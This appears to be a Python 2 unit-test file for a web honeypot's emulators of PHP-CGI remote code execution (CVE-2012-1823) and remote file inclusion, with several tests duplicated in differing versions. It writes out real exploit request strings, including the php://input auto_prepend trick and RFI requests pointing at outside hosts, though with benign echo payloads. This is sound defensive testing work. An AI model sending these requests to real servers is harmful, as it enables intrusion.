def test_phpcgi_rce_emulator(self):
"""Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823
Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input POST: <?php echo("rce attempt"); ?>
Expected Result: Remote command execution of a echo command
Notes:"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
os.mkdir(os.path.join(self.data_dir, 'files/'))
request = "POST /index.php?-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input HTTP/1.0\r\n\r\n" \
'<?php echo "testing"; ?>'
event = attack.AttackEvent()
event.http_request = HTTPHandler(request, None)
event.matched_pattern = "php_cgi_rce"
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
emulator.handle(event)
print "Return value:", event.http_request.get_response()
self.assertTrue("""testing""" == event.http_request.get_response())
def test_phpcgi_rce_emulator(self):
"""Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823
Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input POST: <?php echo("rce attempt"); ?>
Expected Result: Remote command execution of a echo command
Notes:"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
os.mkdir(os.path.join(self.data_dir, 'files/'))
request = "POST /index.php?-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input HTTP/1.0\r\n\r\n" \
'<?php echo "testing"; ?>'
event = attack.AttackEvent()
event.http_request = HTTPHandler(request, None)
event.matched_pattern = "php_cgi_rce"
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
emulator.handle(event)
print "Return value:", event.http_request.get_response()
self.assertTrue("""testing""" == event.http_request.get_response())
def test_rfi_emulator_with_malformed_uri(self):
# TODO: Handle return value from sandbox
"""Objective: Remote File Injection test with malformed uri
Input: http://localhost:8080/test.php?p="http://google.com/index.html
Expected Result: The return value from the PHP sandbox.
Notes: Injected file contains <?php echo("test successful"); ?>"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
print "Starting remote file inclusion test"
event = attack.AttackEvent()
event.http_request = HTTPHandler('GET /test.php?p=http://1durch0.de/test_file.txt HTTP/1.0', None)
event.matched_pattern = "rfi"
helpers.create_sandbox(self.data_dir)
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
print "Sending request:", "http://localhost:8080" + event.http_request.path
emulator.handle(event)
self.assertEqual(event.http_request.get_response(), "test successful")
print "Return value 'test successful', matching our expectation."
def test_phpcgi_rce_emulator(self):
"""Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823
Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input POST: <?php echo("rce attempt"); ?>
Expected Result: Remote command execution of a echo command
Notes:"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
os.mkdir(os.path.join(self.data_dir, 'files/'))
self.event.parsed_request = util.HTTPRequest()
self.event.parsed_request.method = 'POST'
self.event.parsed_request.url = "/index.php"
self.event.parsed_request.parameters = "-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input"
self.event.matched_pattern = "php_cgi_rce"
self.event.parsed_request.body = '<?php echo "testing"; ?>'
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(self.event.matched_pattern)
emulator.handle(self.event)
print "Return value:", self.event.response
self.assertTrue("""testing""" == self.event.response)
def test_phpcgi_rce_emulator(self):
"""Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823
Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input POST: <?php echo("rce attempt"); ?>
Expected Result: Remote command execution of a echo command
Notes:"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
os.mkdir(os.path.join(self.data_dir, 'files/'))
self.event.parsed_request = util.HTTPRequest()
self.event.parsed_request.method = 'POST'
self.event.parsed_request.url = "/index.php"
self.event.parsed_request.parameters = "-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input"
self.event.matched_pattern = "php_cgi_rce"
self.event.parsed_request.body = '<?php echo "testing"; ?>'
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(self.event.matched_pattern)
emulator.handle(self.event)
print "Return value:", self.event.response
self.assertTrue("""testing""" == self.event.response)
def test_rfi_emulator_with_malformed_uri(self):
# TODO: Handle return value from sandbox
"""Objective: Remote File Injection test with malformed uri
Input: http://localhost:8080/test.php?p="http://google.com/index.html
Expected Result: The return value from the PHP sandbox.
Notes: Injected file contains <?php echo("test successful"); ?>"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
print "Starting remote file inclusion test"
event = attack.AttackEvent()
event.http_request = HTTPHandler('GET /test.php?p=http://1durch0.de/test_file.txt HTTP/1.0', None)
event.matched_pattern = "rfi"
helpers.create_sandbox(self.data_dir)
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
print "Sending request:", "http://localhost:8080" + event.http_request.path
emulator.handle(event)
self.assertEqual(event.http_request.get_response(), "test successful")
print "Return value 'test successful', matching our expectation."
def test_rfi_emulator(self):
# TODO: Handle return value from sandbox
"""Objective: Remote File Injection test.
Input: http://localhost:8080/test.php?p=http://google.com/index.html
Expected Result: The return value from the PHP sandbox.
Notes: Injected file contains <?php echo("test successful"); ?>"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
print "Starting remote file inclusion test"
self.event.parsed_request = util.HTTPRequest()
self.event.parsed_request.url = "/test.php?p=http://1durch0.de/test_file.txt"
print "Sending request:", "http://localhost:8080" + self.event.parsed_request.url
self.event.matched_pattern = "rfi"
self.event.response = ""
helpers.create_sandbox(self.data_dir)
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(self.event.matched_pattern)
emulator.handle(self.event)
self.assertEqual(self.event.response, "test successful")
print "Return value 'test successful', matching our expectation."
def test_rfi_emulator(self):
# TODO: Handle return value from sandbox
"""Objective: Remote File Injection test.
Input: http://localhost:8080/test.php?p=http://google.com/index.html
Expected Result: The return value from the PHP sandbox.
Notes: Injected file contains <?php echo("test successful"); ?>"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
print "Starting remote file inclusion test"
self.event.parsed_request = util.HTTPRequest()
self.event.parsed_request.url = "/test.php?p=http://1durch0.de/test_file.txt"
print "Sending request:", "http://localhost:8080" + self.event.parsed_request.url
self.event.matched_pattern = "rfi"
self.event.response = ""
helpers.create_sandbox(self.data_dir)
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(self.event.matched_pattern)
emulator.handle(self.event)
self.assertEqual(self.event.response, "test successful")
print "Return value 'test successful', matching our expectation."
def test_rfi_emulator_with_malformed_uri(self):
# TODO: Handle return value from sandbox
"""Objective: Remote File Injection test with malformed uri
Input: http://localhost:8080/test.php?p="http://google.com/index.html
Expected Result: The return value from the PHP sandbox.
Notes: Injected file contains <?php echo("test successful"); ?>"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
print "Starting remote file inclusion test"
event = attack.AttackEvent()
url = "https://gist.githubusercontent.com/glaslos/02c4c4be39fb03b3bbee5c862cd304c6/raw/adf146469e8eeee4498874164ecd80c70ffb4e7a/test_file.txt"
event.http_request = HTTPHandler('GET /test.php?p={} HTTP/1.0'.format(url), None)
event.matched_pattern = "rfi"
helpers.create_sandbox(self.data_dir)
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
print "Sending request:", "http://localhost:8080" + event.http_request.path
emulator.handle(event)
self.assertEqual(event.http_request.get_response(), "test successful")
print "Return value 'test successful', matching our expectation."
def test_rfi_emulator_with_malformed_uri(self):
# TODO: Handle return value from sandbox
"""Objective: Remote File Injection test with malformed uri
Input: http://localhost:8080/test.php?p="http://google.com/index.html
Expected Result: The return value from the PHP sandbox.
Notes: Injected file contains <?php echo("test successful"); ?>"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
print "Starting remote file inclusion test"
event = attack.AttackEvent()
url = "https://gist.githubusercontent.com/glaslos/02c4c4be39fb03b3bbee5c862cd304c6/raw/adf146469e8eeee4498874164ecd80c70ffb4e7a/test_file.txt"
event.http_request = HTTPHandler(
'GET /test.php?p={} HTTP/1.0'.format(url), None)
event.matched_pattern = "rfi"
helpers.create_sandbox(self.data_dir)
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
print "Sending request:", "http://localhost:8080" + event.http_request.path
emulator.handle(event)
self.assertEqual(event.http_request.get_response(), "test successful")
print "Return value 'test successful', matching our expectation."
